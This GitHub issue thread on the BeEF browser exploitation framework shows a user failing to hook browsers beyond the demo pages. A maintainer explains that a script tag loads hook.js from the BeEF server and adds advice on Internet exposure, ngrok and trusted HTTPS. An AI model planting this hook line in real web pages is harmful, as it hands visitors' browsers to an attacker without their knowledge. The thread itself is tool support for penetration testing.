### ISSUE TITLE
hook.js won't hook

### ISSUE THREAD

**Issue by Sa1tama228** [beefproject/beef#3007]
## First Steps

1. Confirm that your issue has not been posted previously by searching here: https://github.com/beefproject/beef/issues
2. Confirm that the wiki does not contain the answers you seek: https://github.com/beefproject/beef/wiki
3. Check the FAQ: https://github.com/beefproject/beef/wiki/FAQ
4. BeEF Version:latest
5. Ruby Version:latest
6. Browser Details (e.g. Chrome v81.0): testing at opera and chrome
7. Operating System (e.g. OSX Catalina):kali and windows 10

## Configuration

1. Have you made any changes to your BeEF configuration? No
2. Have you enabled or disabled any BeEF extensions? Yes

## Steps to Reproduce

https://imgur.com/a/R1GBq3Z (and browser won't be hooked.Just opens this)

**Comment by bcoles** [comment]
Try the demo pages. Refer to the demo links in the Getting Started page presented immediately after logging in to BeEF.

**Comment by Sa1tama228** [comment]
> Try the demo pages. Refer to the demo links in the Getting Started page presented immediately after logging in to BeEF.

yea, demo work but another dont, for me not enough just get only demo, sorry.

**Comment by bcoles** [comment]
The BeEF hook is written in JavaScript. The hook URL is written to terminal when you start BeEF. By default, the URL path is `/hook.js`.

Web browsers will treat JavaScript code as text unless the browser is instructed to execute the code. Web browsers can be instructed to execute JavaScript code using `<script>` HTML tags.

* https://www.w3schools.com/Tags/tag_script.asp
* https://www.w3schools.com/TAGS/att_script_src.asp

You can include it in any HTML page using `<script>` tags the same way you would any other JavaScript file:

```html
<script src="https://beef.local:3000/hook.js"></script>
```

The BeEF hook must be executed by a JavaScript processing engine. If the target host runs the BeEF hook in a JavaScript processing engine, such as a web browser, then the target host is hooked by BeEF.

Note that in order for browsers to connect to be hooked by BeEF they must be able to establish a TCP connection to the BeEF server.

If you are running BeEF on your home network it will not be accessible from the Internet. If you question is about network routing, refer to:

* https://github.com/beefproject/beef/wiki/FAQ#how-do-i-configure-beef-on-a-server-behind-nat
* https://github.com/beefproject/beef/wiki/FAQ#how-do-i-configure-beef-with-ngrok


Also note that modern web browsers refuse to load JavaScript resources on HTTPS pages from HTTP sources.

As such, you will need to either enable HTTPS or host BeEF behind a HTTPS reverse proxy.

Note that if you enable HTTPS you must use a valid certificate signed by a trusted certificate authority. Self-signed certificates are not trusted. Web browsers will not connect.

**Comment by Sa1tama228** [comment]
thank you so much!

**Comment by Sa1tama228** [comment]
> ```
> <script src="https://beef.local:3000/hook.js"></script>
> ```

its not work
